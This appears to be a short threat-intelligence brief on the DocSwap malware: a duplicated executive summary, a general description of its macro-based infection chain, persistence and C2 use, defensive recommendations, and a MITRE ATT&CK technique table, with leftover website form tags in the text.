EXECUTIVE SUMMARY:
DocSwap is a malware disguised as a security document viewer, designed to deceive users into executing malicious files. It targets IT professionals and security researchers, likely aiming to steal sensitive data. By mimicking credible cybersecurity alerts, DocSwap exploits trust to infiltrate systems. Its persistence mechanisms and ability to evade detection make it a serious threat.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
DocSwap is a malware disguised as a security document viewer, designed to deceive users into executing malicious files. It targets IT professionals and security researchers, likely aiming to steal sensitive data. By mimicking credible cybersecurity alerts, DocSwap exploits trust to infiltrate systems. Its persistence mechanisms and ability to evade detection make it a serious threat.[emaillocker id="1283"]
DocSwap’s infection chain starts with a malicious document containing macros that trigger PowerShell commands to download payloads. The malware embeds its code in legitimate-looking files to bypass detection. It modifies registry keys for persistence and communicates with a C2 server for remote commands and data theft. Its sandbox evasion tactics further enhance its stealth.
DocSwap highlights evolving malware tactics that blend deception with advanced evasion techniques. Its focus on security professionals suggests espionage motives. To reduce risk, organizations should adopt strong email filtering, conduct security training, and deploy behavior-based threat detection tools. Proactive measures are essential to counter threats like DocSwap.
THREAT PROFILE:
| Tactic | Technique ID | Technique |
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1547 | Boot or Logon Autostart Execution |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| T1497 | Virtualization/Sandbox Evasion | |
| Discovery | T1083 | File and Directory Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details:
https://securityonline.info/north-korean-hackers-deploy-docswap-malware-disguised-as-security-app/